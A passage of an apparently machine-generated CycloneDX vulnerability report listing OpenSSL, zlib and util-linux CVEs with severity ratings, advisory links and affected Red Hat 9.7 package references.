group list, or explicitly defines its own list by directly defining the\nvarious desired groups and group 'tuples'.\n\nNo OpenSSL FIPS modules are affected by this issue, the code in question lies\noutside the FIPS boundary.\n\nOpenSSL 3.6 and 3.5 are vulnerable to this issue.\n\nOpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released.\nOpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released.\n\nOpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-2673" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/13/3" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-2673" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html" }, { "url": "https://github.com/advisories/GHSA-wj64-gh9j-xm82" }, { "url": "https://github.com/openssl/openssl/commit/2157c9d81f7b0bd7dfa25b960e928ec28e8dd63f" }, { "url": "https://github.com/openssl/openssl/commit/85977e013f32ceb96aa034c0e741adddc1a05e34" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2673" }, { "url": "https://openssl-library.org/news/secadv/20260313.txt" }, { "url": "https://ubuntu.com/security/notices/USN-8155-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-2673" } ], "published": "2026-03-13T19:54:34+00:00", "updated": "2026-05-12T13:17:34+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.0.7-8.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.0.7-8.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-27171", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "julia" }, "score": 2.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 1284 ], "description": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-27171" }, { "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit" }, { "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/" }, { "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-27171" }, { "url": "https://github.com/advisories/GHSA-h858-mf2m-8jf4" }, { "url": "https://github.com/madler/zlib/issues/904" }, { "url": "https://github.com/madler/zlib/releases/tag/v1.3.2" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171" }, { "url": "https://ostif.org/zlib-audit-complete" }, { "url": "https://ostif.org/zlib-audit-complete/" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-27171" } ], "published": "2026-02-18T04:16:01+00:00", "updated": "2026-03-25T21:27:04+00:00", "affects": [ { "ref": "pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.2.11-40.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-27456", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 4.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "redhat" }, "score": 4.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 59, 269, 367 ], "description": "util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-27456" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-27456" }, { "url": "https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4" }, { "url": "https://github.com/util-linux/util-linux/releases/tag/v2.41.4" }, { "url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27456" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-27456" } ], "published": "2026-04-03T22:16:25+00:00", "updated": "2026-04-22T16:08:55+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.37.4-21.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libfdisk@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.37.4-21.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.37.4-21.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.37.4-21.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.37.4-21.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/util-linux-core@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.37.4-21.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/util-linux@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.37.4-21.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libfdisk@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/util-linux-core@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/util-linux@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libfdisk@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/util-linux-core@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/util-linux@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libfdisk@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/util-linux-core@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/util-linux@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": 